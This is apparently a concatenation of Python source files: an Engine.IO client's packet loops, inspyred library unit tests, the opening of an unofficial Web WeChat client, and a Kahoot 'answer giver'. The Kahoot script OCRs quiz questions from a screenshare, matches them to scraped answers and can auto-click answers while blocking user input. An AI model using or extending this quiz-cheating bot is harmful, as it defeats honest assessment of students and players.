p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketTimeoutException:
self.logger.warning(
'Server has stopped communicating, aborting')
self.queue.put(None)
break
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'text/plain'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None or isinstance(r, str):
self.logger.warning(
r or 'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode()
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except (websocket.WebSocketConnectionClosedException,
BrokenPipeError, OSError):
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
|
main.py
|
'''
KAHOOT ANSWER GIVER FROM GOOGLEMEET SCREENSHARE
DATE: 25/02/2020
AUTHOR: ARRZ.DEV
'''
#DEFAULT
import os
from os import system
import sys
from time import sleep
import json
import datetime
from threading import Thread
import win32api, win32con
from ctypes import *
#NORMALIZER MODULE
import unidecode
#COLORIZED
import colorama
#SELF-MADE MODULES
from modules.db_management import *
from modules.algorithms import *
#IMAGING MODULES
import numpy as np
from PIL import ImageGrab, Image, ImageOps, ImageFilter
import pytesseract
# --SETTINGS--
autop = False #AUTO PLAY AI [TRUE / FALSE]
banner = '''\033[93m
_ __ _ _ _ ___ ___ _____ ___ ___ _____
| |/ / /_\ | || |/ _ \ / _ \_ _|__| _ )/ _ \_ _|
| ' < / _ \| __ | (_) | (_) || ||___| _ \ (_) || |
|_|\_\/_/ \_\_||_|\___/ \___/ |_| |___/\___/ |_|
'''
#SET FUNCTIONS
def SetTitle(title=False):
if not title:
return 'you need to specify a title'
system(f'title "{title}"')
def SetWindow():
#SET HEIGHT AND WIDTH
system('mode con:cols=65 lines=35')
#CALL DISPLAY FUNCTION
Display(status='Getting user topic input')
def SetDB(topic=False):
global db
#ARGUMENT NEED TO BE EITHER 'SAVE' OR 'LOAD'
dbs = [f for f in os.listdir('databases')]
if '.json' not in topic:
topic = f'{topic}.json'
#LOGIC IF ARGUMENT EQUALS TO 'SAVE'
if topic not in dbs:
#GET LANGUAGE
language = str(input(' Language (pt or en): '))
#GET THE KAHOOT LINKS
raw_topic = topic.replace('.json', '')
Display(status='Getting Links')
top_links = get_links(topic=raw_topic, language=language)
Display(status=f'Building Database of {raw_topic}')
db = create_db(top_links)
#SAVE THE DATA IN THE FILE SPECIFIED EARLIER
with open(f'databases/{topic}', 'w') as f:
f.write(str(db))
#LOGIC IF ARGUMENT EQUALS TO 'LOAD'
else:
#LOAD THE DB FROM THE FILE SPECIFIED EARLIER
Display(status='Loading Database')
db = json.loads(open(f'databases/{topic}').read().replace('\'', '"'))
#INFORMATION PROCESSMENT FUNCTIONS
def Imaging():
while True:
#REAL TIME LOAD COORDS CONFIG
coords = json.loads(open(f'coords.json').read())
fullscreen_coords = coords['ingame']
full_img = np.array(FilterImage(ImageGrab.grab(bbox=(fullscreen_coords['x-off'],fullscreen_coords['y-off'],fullscreen_coords['width'],fullscreen_coords['height']))))
question_game_image = np.array(FilterImage(ImageGrab.grab(bbox=(fullscreen_coords['x-off'],fullscreen_coords['y-off']+5,fullscreen_coords['width'],420))))
question_loading_image = np.array(FilterImage(ImageGrab.grab(bbox=(fullscreen_coords['x-off'],fullscreen_coords['y-off']+200,fullscreen_coords['width'],645))))
#cv2.imshow('aa', full_img)
#cv2.imshow('bb', question_game_image)
#cv2.imshow('cc', question_loading_image)
while Waiting(full_img):
Imaging()
#GET RESPONSE FROM THE FUNCTION
if not Gaming(question_game_image):
Gaming(question_loading_image)
def Waiting(image):
global Flag
global last_status
waiting_texts = ['waiting for players', 'join', 'start', 'entre', 'iniciar', 'aguardando jogadores']
try:
page_text = (pytesseract.image_to_string(image, lang='eng')).lower()
except:
pass
if any(x in page_text for x in waiting_texts):
last_status = 'Waiting for game to start'
Display(status=last_status)
Flag = False
return True
else:
Flag = True
last_status = 'Game Running'
Display(status=last_status)
return False
def Gaming(image):
global last_answer
global last_question
global last_probability
#GET RAW TEXT FROM IMAGE
raw_question = unidecode.unidecode((pytesseract.image_to_string(image, lang='eng')).lower()).strip()
#CLEAN RAW QUESTION
question = CleanRaw(raw_question)
#LOGIC TO DISPLAY THE ANSWER, PROBABILITY ETC..
if question != '' and question != last_question:
#TRY GO GET THE ANSWER IN CASE THE QUESTION MATCH 100%
try:
answer = db[question]
if answer != last_answer:
#CALL DISPLAY WITH ANSWER
last_probability = '100'
last_answer = answer
last_question = question
Display(question=question, answer=answer, probability='100')
#IF EXCEPTION RUN MEANS THE QUESTION DOESNT MATCH 100% IN DATABASE
except:
#RUN ALGORITHM AND GET ANSWER WITH THE BEST FITNESS
probability, question = identify_question(dictionary=db, question=question)
#SET THE CORRECT ANSWER IF THE PROBABILITY IS GREATER THAN 40% AND THE ANSWER IS DIFFERENT FROM THE ONE THAT IS ALREADY SET
if probability > 40:
answer = db[question]
if answer != last_answer:
#CALL DISPLAY WITH ANSWER
last_answer = answer
last_question = question
last_probability = probability
Display(question=question, answer=answer, probability=probability)
else:
return False
def AutoPlay():
last_action = ''
def click(x,y):
#BLOCKING USER INPUT
windll.user32.BlockInput(True)
#MOVE CURSOR TO THE POSITION
win32api.SetCursorPos((x,y))
#PERFORM A CLICK 2 TIMES
for i in range(2):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
sleep(0.02) #This pauses the script for 0.02 seconds
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
#MOVE THE MOUSE TO THE MIDDLE OF THE BUTTONS
win32api.SetCursorPos((1425,215))
#ENABLE USER INPUT
windll.user32.BlockInput(False)
while True:
coords = json.loads(open(f'coords.json').read())
if any(last_answer == x for x in ['verdadeira', 'falsa', 'true', 'false', 'falso', 'verdadeiro']):
#['verdadeiro', 'falso', 'true', 'false']
fiftyfifty_left = coords['answer_5050_left']
fiftyfifty_right = coords['answer_5050_right']
fiftyfifty_left_btn = np.array(FilterImage(ImageGrab.grab(bbox=(fiftyfifty_left['x-off'],fiftyfifty_left['y-off'],fiftyfifty_left['width'],fiftyfifty_left['height']))))
fiftyfifty_right_btn = np.array(FilterImage(ImageGrab.grab(bbox=(fiftyfifty_right['x-off'],fiftyfifty_right['y-off'],fiftyfifty_right['width'],fiftyfifty_right['height']))))
raw_array = [fiftyfifty_left_btn, fiftyfifty_right_btn]
#GET TEXT, CLEAN IT, AND ADD IT TO A CLEAN ARRAY
clean_array = []
for button in raw_array:
raw_answer = unidecode.unidecode((pytesseract.image_to_string(button, lang='eng')).lower()).strip()
clean_array.append(raw_answer)
#CHECK SO WE DONT REPEAT THE SAME CLICK ACTION AS BEFORE
if last_answer != last_action:
#GET THE INDEX OF THE ANSWER
algo_response = identify_answer_index(answer=last_answer, dictionary=clean_array)
#IF a != False and probability > 0
if algo_response:
if algo_response[0] > 0:
Display(lurdes_status='Let me help you!')
#OVERWRITE THE LAST ACTION WITH THE NEW ANSWER ACTION
last_action = last_answer
#DEFINE INDEX OF THE ANSWER
index = algo_response[1]
if index == 0:
click(coords["player_5050_left"]["x-off"], coords["player_5050_left"]["y-off"])
button = 'left'
elif index == 1:
click(coords["player_5050_right"]["x-off"], coords["player_5050_right"]["y-off"])
button = 'right'
sleep(1)
Display(lurdes_status=f'Clicked the {button} button ({last_answer})')
else:
#button_cords
top_left = coords['answer_top_left']
top_right = coords['answer_top_right']
bottom_right = coords['answer_bottom_right']
bottom_left = coords['answer_bottom_left']
#BUTTONS IMAGE
top_left_btn = np.array(FilterImage(ImageGrab.grab(bbox=(top_left['x-off'],top_left['y-off'],top_left['width'],top_left['height']))))
top_right_btn = np.array(FilterImage(ImageGrab.grab(bbox=(top_right['x-off'],top_right['y-off'],top_right['width'],top_right['height']))))
bottom_left_btn = np.array(FilterImage(ImageGrab.grab(bbox=(bottom_left['x-off'],bottom_left['y-off'],bottom_left['width'],bottom_left['height']))))
bottom_right_btn = np.array(FilterImage(ImageGrab.grab(bbox=(bottom_right['x-off'],bottom_right['y-off'],bottom_right['width'],bottom_right['height']))))
raw_array = [top_left_btn, top_right_btn, bottom_left_btn, bottom_right_btn]
#GET TEXT, CLEAN IT, AND ADD IT TO A CLEAN ARRAY
clean_array = []
for button in raw_array:
raw_answer = unidecode.unidecode((pytesseract.image_to_string(button, lang='eng')).lower()).strip()
clean_array.append(raw_answer)
#CHECK SO WE DONT REPEAT THE SAME CLICK ACTION AS BEFORE
if last_answer != last_action:
Display(lurdes_status='I\'am thinking..')
#GET THE INDEX OF THE ANSWER
algo_response = identify_answer_index(answer=last_answer, dictionary=clean_array)
#IF a != False and probability > 0
if algo_response:
if algo_response[0] > 0:
#OVERWRITE THE LAST ACTION WITH THE NEW ANSWER ACTION
last_action = last_answer
#DEFINE INDEX OF THE ANSWER
index = algo_response[1]
if index == 0:
click(coords["player_top_left"]["x-off"], coords["player_top_left"]["y-off"])
button = 'top left'
elif index == 1:
click(coords["player_top_right"]["x-off"], coords["player_top_right"]["y-off"])
button = 'top right'
elif index == 2:
click(coords["player_bottom_left"]["x-off"], coords["player_bottom_left"]["y-off"])
button = 'bottom left'
elif index == 3:
click(coords["player_bottom_right"]["x-off"], coords["player_bottom_right"]["y-off"])
button = 'bottom right'
sleep(1)
Display(lurdes_status=f'Clicked the {button} button ({last_answer})')
#DISPLAY FUNCTION
def Display(status=False, question=False, answer=False, probability=False, lurdes_status=False):
if not question or not answer or not probability:
question = last_question
probability = last_probability
answer = last_answer
if not status:
status = last_status
if not lurdes_status:
lurdes_status = 'I\'m alive!'
#CHANGE TITLE
SetTitle(title=status)
#PROBABILITY ROUND
probability = str(probability)[:4]
#RE-STRUCT
if len(question) == 0:
question = ' '*48
elif len(question) < 46:
question = f'{question}..{(46-len(question))*" "}'
else:
question = f'{question[:46]}..'
if len(answer) == 0:
answer = ' '*48
elif len(answer) < 46:
answer = f'{answer}..{(46-len(answer))*" "}'
else:
answer = f'{answer[:46]}..'
if len(status) < 48:
status = f'{status}{(48-len(status))*" "}'
#LURDES STATUS
if len(lurdes_status) < 48:
lurdes_status = f'{lurdes_status}{(48-len(lurdes_status))*" "}'
else:
lurdes_status = f'{lurdes_status[:46]}..'
#ROUND PROBABILITY
if len(str(probability)) == 0:
probability = ' '*47
elif str(probability)[:3] == '100':
probability = f'{str(probability)[:3]}%{" "*43}'
else:
probability = f'{str(probability)[:4]}%{" "*42}'
#CHANGE COLOR CONSOANT STATUS
if 'running' in status.lower():
status = f'\033[92m{status}\033[94m'
else:
status = f'\033[91m{status}\033[94m'
ClearWindow()
print(banner)
print(f'''\033[94m
|--------------------------------------------------|
| \033[93mSTATUS:\033[94m |
| {status} |
|--------------------------------------------------|
''')
print(f'''\033[94m
|--------------------------------------------------|
| \033[93mPERGUNTA:\033[94m |
| \033[92m{question.capitalize()}\033[94m |
|--------------------------------------------------|
| \033[93mREPOSTA:\033[94m |
| \033[92m{answer.capitalize()}\033[94m |
|--------------------------------------------------|
| \033[93mPROBABILIDADE DE ACERTO:\033[94m |
| \033[92m{probability}\033[94m |
|--------------------------------------------------|
''')
if autop:
print(f'''\033[94m
|--------------------------------------------------|
| \033[93mA.I: \033[94m |
| \033[92m{lurdes_status}\033[94m |
|--------------------------------------------------|
''')
#OTHER FUNCTIONS
def CleanRaw(text):
#CLEAN THE QUESTION TEXT
sliced_question = text.split('\n')
for slice_ in sliced_question:
if len(slice_) > 10:
return slice_.strip()
break
else:
return ''
def ClearWindow():
if sys.platform.startswith('linux'):
system('clear')
else:
system('cls')
def FilterImage(image):
return ImageOps.grayscale(image).filter(ImageFilter.MinFilter(1)).filter(ImageFilter.SMOOTH_MORE).filter(ImageFilter.SMOOTH_MORE)
if __name__ == '__main__':
#INIT COLORAMA AUTO-RESET
colorama.init(autoreset=True)
#INIT GLOBAL VARAIBLES
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files (x86)\Tesseract-OCR\tesseract.exe"
Flag = False
last_question = ''
last_answer = ''
last_status = ''
last_probability = ''
db = None
#INIT AUTOPLAY IN CASE ITS TRUE
if autop:
t = Thread(target=(AutoPlay))
t.start()
#SET WINDOW
SetWindow()
#SET DB BY SCRAPING OR LOADING
SetDB(topic=str(input(' Topico: ')),)
#START THE MAIN FUNCTION
Imaging()
|
operator_tests.py
|
import unittest
import random
import logging
import itertools
import multiprocessing
import inspyred
class DummyEC(object):
pass
def test_generator(random, args):
return [random.random() for _ in range(6)]
def test_evaluator(candidates, args):
fitness = []
for c in candidates:
fitness.append(sum(c))
return fitness
def test_evaluator_mo(candidates, args):
fitness = []
for c in candidates:
fitness.append(inspyred.ec.emo.Pareto([sum(c), sum(c)]))
return fitness
def test_set_up(generator, evaluator):
pop_size = 12
prng = random.Random()
prng.seed(111111)
candidates = [generator(prng, {}) for _ in range(pop_size)]
fitnesses = evaluator(candidates, {})
population = [inspyred.ec.Individual(candidate=c) for c in candidates]
for i, f in zip(population, fitnesses):
i.fitness = f
parents = population[:pop_size//2]
offspring = population[pop_size//2:]
return (prng, candidates, fitnesses, population, parents, offspring)
def test_process(random, population, migrator, output_queue):
for i in range(9999):
population = migrator(random, population, {})
output_queue.put(population)
class ArchiverTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator_mo)
def test_default_archiver(self):
new_archive = inspyred.ec.archivers.default_archiver(self.prng, list(self.population), [], {})
assert not new_archive
def test_best_archiver(self):
new_archive = inspyred.ec.archivers.best_archiver(self.prng, list(self.population), [], {})
assert new_archive == [max(self.population)]
def test_adaptive_grid_archiver(self):
new_archive = inspyred.ec.archivers.adaptive_grid_archiver(self.prng, list(self.population), [], {})
assert len(new_archive) == 1
class MigratorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
def test_default_migration(self):
migrants = inspyred.ec.migrators.default_migration(self.prng, list(self.population), {})
assert migrants == self.population
# Multiprocessing migration test may fail simply due to randomness of the migration.
# It is recommended to run the test multiple times to make sure that it consistently
# fails before spending time looking for errors.
def test_multiprocessing_migration(self):
queue = multiprocessing.Queue()
migrator = inspyred.ec.migrators.MultiprocessingMigrator()
populations = [["red", "orange", "yellow", "green", "blue", "indigo", "violet"],
[1, 2, 3, 4, 5, 6, 7],
["bashful", "doc", "dopey", "grumpy", "happy", "sleepy", "sneezy"]]
jobs = []
for pop in populations:
p = multiprocessing.Process(target=test_process, args=(self.prng, list(pop), migrator, queue))
p.start()
jobs.append(p)
for j in jobs:
j.join()
final_pops = []
while queue.qsize() > 0:
final_pops.append(set(queue.get()))
for p in final_pops:
a = p & set(populations[0])
b = p & set(populations[1])
c = p & set(populations[2])
assert len(a) > 0 and len(b) > 0 and len(c) > 0
class ReplacerTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
self.prng_mo, self.candidates_mo, self.fitnesses_mo, self.population_mo, self.parents_mo, self.offspring_mo = test_set_up(test_generator, test_evaluator_mo)
self.ec = DummyEC()
self.ec.num_evaluations = 10
self.ec.archive = []
self.ec.archiver = inspyred.ec.archivers.adaptive_grid_archiver
def test_default_replacement(self):
survivors = inspyred.ec.replacers.default_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert survivors == self.population
def test_truncation_replacement(self):
survivors = inspyred.ec.replacers.truncation_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and max(max(self.population), max(self.offspring)) == max(survivors)
def test_steady_state_replacement(self):
survivors = inspyred.ec.replacers.steady_state_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and all([o in survivors for o in self.offspring])
def test_generational_replacement(self):
survivors = inspyred.ec.replacers.generational_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert all([s in self.offspring for s in survivors])
def test_random_replacement(self):
survivors = inspyred.ec.replacers.random_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and all([o in survivors for o in self.offspring])
def test_plus_replacement(self):
survivors = inspyred.ec.replacers.plus_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and max(max(self.parents), max(self.offspring)) == max(survivors)
def test_comma_replacement(self):
survivors = inspyred.ec.replacers.comma_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == min(len(self.population), len(self.offspring)) and all([s in self.offspring for s in survivors])
def test_crowding_replacement(self):
survivors = inspyred.ec.replacers.crowding_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and max(max(self.population), max(self.offspring)) == max(survivors)
def test_simulated_annealing_replacement(self):
survivors = inspyred.ec.replacers.simulated_annealing_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring),
{'_ec':self.ec, 'max_evaluations':100})
assert len(survivors) == len(self.parents) and max(max(self.parents), max(self.offspring)) == max(survivors)
def test_nsga_replacement(self):
survivors = inspyred.ec.replacers.nsga_replacement(self.prng_mo, list(self.population_mo), list(self.parents_mo), list(self.offspring_mo), {})
assert (len(survivors) == len(self.population_mo) and
max(max(self.population_mo), max(self.offspring_mo)) == max(survivors))
def test_paes_replacement(self):
survivors = inspyred.ec.replacers.paes_replacement(self.prng_mo, list(self.population_mo), list(self.parents_mo), list(self.offspring_mo), {'_ec':self.ec})
assert (len(survivors) == min(len(self.parents_mo), len(self.offspring_mo)) and
max(survivors) == max(max(self.parents_mo), max(self.offspring_mo)))
class SelectorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
def test_default_selection(self):
parents = inspyred.ec.selectors.default_selection(self.prng, list(self.population), {})
assert parents == self.population
def test_truncation_selection(self):
parents = inspyred.ec.selectors.truncation_selection(self.prng, list(self.population), {})
assert all([p in parents for p in self.population])
def test_uniform_selection(self):
parents = inspyred.ec.selectors.uniform_selection(self.prng, list(self.population), {})
assert len(parents) == 1 and all([p in self.population for p in parents])
def test_fitness_proportionate_selection(self):
parents = inspyred.ec.selectors.fitness_proportionate_selection(self.prng, list(self.population), {})
assert len(parents) == 1 and all([p in self.population for p in parents])
def test_rank_selection(self):
parents = inspyred.ec.selectors.rank_selection(self.prng, list(self.population), {})
assert len(parents) == 1 and all([p in self.population for p in parents])
def test_tournament_selection(self):
parents = inspyred.ec.selectors.tournament_selection(self.prng, list(self.population), {'tournament_size':len(self.population)})
assert len(parents) == 1 and max(parents) == max(self.population)
class TerminatorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
self.ec = DummyEC()
self.ec.logger = logging.getLogger('inspyred.test')
def test_default_termination(self):
t = inspyred.ec.terminators.default_termination(list(self.population), 1, 1, {})
assert t == True
def test_diversity_termination(self):
p = [inspyred.ec.Individual(candidate=[1, 1, 1]) for _ in range(10)]
t = inspyred.ec.terminators.diversity_termination(list(p), 1, 1, {})
assert t == True
def test_average_fitness_termination(self):
p = [inspyred.ec.Individual(candidate=i.candidate) for i in self.population]
for x in p:
x.fitness = 1
t = inspyred.ec.terminators.average_fitness_termination(list(p), 1, 1, {})
assert t == True
def test_evaluation_termination(self):
t = inspyred.ec.terminators.evaluation_termination(list(self.population), 1, len(self.population), {})
assert t == True
def test_generation_termination(self):
t = inspyred.ec.terminators.generation_termination(list(self.population), 1, 1, {})
assert t == True
def test_time_termination(self):
t = inspyred.ec.terminators.time_termination(list(self.population), 1, 1, {'_ec':self.ec, 'max_time':0})
assert t == True
class VariatorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
self.ec = DummyEC()
self.ec.bounder = inspyred.ec.Bounder(0, 1)
self.ec.population = list(self.population)
def test_default_variation(self):
offspring = inspyred.ec.variators.default_variation(self.prng, list(self.candidates), {})
assert offspring == self.candidates
def test_n_point_crossover(self):
offspring = inspyred.ec.variators.n_point_crossover(self.prng, list(self.candidates), {'num_crossover_points':3})
moms = self.candidates[::2]
dads = self.candidates[1::2]
dmoms = itertools.chain.from_iterable([[t, t] for t in moms])
ddads = itertools.chain.from_iterable([[t, t] for t in dads])
offs = [(offspring[i], offspring[i+1]) for i in range(0, len(offspring), 2)]
assert (all([x in m or x in d for m, d, o in zip(dmoms, ddads, offspring) for x in o]) and
all([(x in o[0] or x in o[1]) and (y in o[0] or y in o[1]) for m, d, o in zip(moms, dads, offs) for x in m for y in m]))
def test_uniform_crossover(self):
offspring = inspyred.ec.variators.uniform_crossover(self.prng, list(self.candidates), {})
moms = self.candidates[::2]
dads = self.candidates[1::2]
dmoms = itertools.chain.from_iterable([[t, t] for t in moms])
ddads = itertools.chain.from_iterable([[t, t] for t in dads])
offs = [(offspring[i], offspring[i+1]) for i in range(0, len(offspring), 2)]
assert (all([x in m or x in d for m, d, o in zip(dmoms, ddads, offspring) for x in o]) and
all([(x in o[0] or x in o[1]) and (y in o[0] or y in o[1]) for m, d, o in zip(moms, dads, offs) for x in m for y in m]))
def test_blend_crossover(self):
alpha = 0.1
offspring = inspyred.ec.variators.blend_crossover(self.prng, list(self.candidates), {'_ec':self.ec, 'blx_alpha':alpha})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tol = alpha * (max(m, d) - min(m, d))
tests.append(x >= (min(m, d) - tol) and x <= (max(m, d) + tol))
assert all(tests)
def test_arithmetic_crossover(self):
alpha = 0.5
cands = [[0, 0, 0], [1, 1, 1]]
offspring = inspyred.ec.variators.arithmetic_crossover(self.prng, list(cands), {'_ec':self.ec, 'ax_alpha':alpha})
for off in offspring:
for o in off:
assert o == 0.5
def test_heuristic_crossover(self):
offspring = inspyred.ec.variators.heuristic_crossover(self.prng, list(self.candidates), {'_ec':self.ec})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tests.append(x >= min(m, d) and x <= max(m, d))
assert all(tests)
def test_simulated_binary_crossover(self):
alpha = 0.2
offspring = inspyred.ec.variators.simulated_binary_crossover(self.prng, list(self.candidates), {'_ec':self.ec})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tol = alpha * (max(m, d) - min(m, d))
tests.append(x >= (min(m, d) - tol) and x <= (max(m, d) + tol))
assert all(tests)
def test_laplace_crossover(self):
alpha = 0.1
offspring = inspyred.ec.variators.laplace_crossover(self.prng, list(self.candidates), {'_ec':self.ec, 'lx_scale': 0.01})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tol = alpha * (max(m, d) - min(m, d))
tests.append(x >= (min(m, d) - tol) and x <= (max(m, d) + tol))
assert all(tests)
def test_gaussian_mutation(self):
offspring = inspyred.ec.variators.gaussian_mutation(self.prng, list(self.candidates), {'_ec':self.ec})
assert(all([x >= 0 and x <= 1 for o in offspring for x in o]))
def test_bit_flip_mutation(self):
class my_random(object):
def random(self):
return 0
r = my_random()
my_candidate = [1, 0, 1, 0, 1, 1, 0, 0, 0, 1]
offspring = inspyred.ec.variators.bit_flip_mutation(r, list([my_candidate]), {})
assert(all([c != o for c, o in zip(my_candidate, offspring[0])]))
def test_random_reset_mutation(self):
class my_random(object):
def random(self):
return 0
def choice(self, v):
return v[0]
r = my_random()
b = inspyred.ec.DiscreteBounder([1, 2, 3])
self.ec.bounder = b
offspring = inspyred.ec.variators.random_reset_mutation(r, list([[1, 3, 2, 2, 1]]), {'_ec': self.ec})
assert all([o == 1 for o in offspring[0]])
def test_nonuniform_mutation(self):
self.ec.num_generations = 0
offspring = inspyred.ec.variators.nonuniform_mutation(self.prng, list(self.candidates), {'_ec':self.ec, 'max_generations': 10})
assert(all([x >= 0 and x <= 1 for o in offspring for x in o]))
if __name__ == '__main__':
unittest.main()
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import random
import multiprocessing
import platform
import logging
import httplib
from collections import defaultdict
from urlparse import urlparse
from lxml import html
#import pdb
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # 好友
self.GroupList = [] # 群
self.GroupMemeberList = [] # 群友
self.PublicUsersList = [] # 公众号/服务号
self.SpecialUsersList = [] # 特殊账号
self.autoReplyMode = False
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
